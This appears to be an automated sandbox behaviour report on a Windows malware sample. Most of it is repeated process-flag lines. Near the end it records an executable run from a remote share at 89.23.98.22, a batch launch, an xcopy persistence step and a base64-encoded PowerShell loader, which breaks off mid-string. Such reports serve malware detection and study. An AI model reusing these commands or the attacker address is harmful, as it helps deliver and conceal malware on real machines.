Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2661Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1541Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3711Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6018Jump to behavior
Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 872Jump to behavior
Source: \Device\Mup\89.23.98.22\LN\GB.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP000.TMP\test2.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\persistent2\test2.exeJump to dropped file
Source: C:\Windows\explorer.exe TID: 3336Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\explorer.exe TID: 3360Thread sleep time: -660000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3676Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3688Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3648Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3612Thread sleep count: 3711 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3612Thread sleep count: 6018 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3684Thread sleep time: -120000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3692Thread sleep time: -2767011611056431s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4084Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3692Thread sleep time: -2400000s >= -30000sJump to behavior
Source: C:\Windows\explorer.exe TID: 3784Thread sleep time: -1560000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: \Device\Mup\89.23.98.22\LN\GB.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c res.bat && test2.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo f "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /s test2.exe "C:\Users\user\AppData\Local\Temp\persistent2\test2.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBEAGUAYwBvAG0AcAByAGUAcwBzAGUAZABCAHkAdABlAEEAcgByAGEAeQAgAHsACgAKACAAIAAgACAAIAAgACAAIABbAEMAbQBkAGwAZQB0AEIAaQBuAGQAaQBuAGcAKAApAF0ACgAgACAAIAAgAFAAYQByAGEAbQAgACgACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQAsAFYAYQBsAHUAZQBGAHIAbwBtAFAAaQBwAGUAbABpAG4AZQAsAFYAYQBsAHUAZQBGAHIAbwBtAFAAaQBwAGUAbABpAG4AZQBCAHkAUAByAG8AcABlAHIAdAB5AE4AYQBtAGUAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJAAoAFQAaAByAG8AdwAoACIALQBiAHkAdABlAEEAcgByAGEAeQAgAGkAcwAgAHIAZQBxAHUAaQByAGUAZAAiACkAKQAKACAAIAAgACAAKQAKACAAIAAgACAAIAAgACAAIABQAHIAbwBjAGUAcwBzACAAewAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFcAcgBpAHQAZQAtAFYAZQByAGIAbwBzAGUAIAAiAEcAZQB0AC0ARABlAGMAbwBtAHAAcgBlAHMAcwBlAGQAQgB5AHQAZQBBAHIAcgBhAHkAIgAKACAAIAAgACAAIAAgACAAIAAkAGkAbgBwAHUAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcg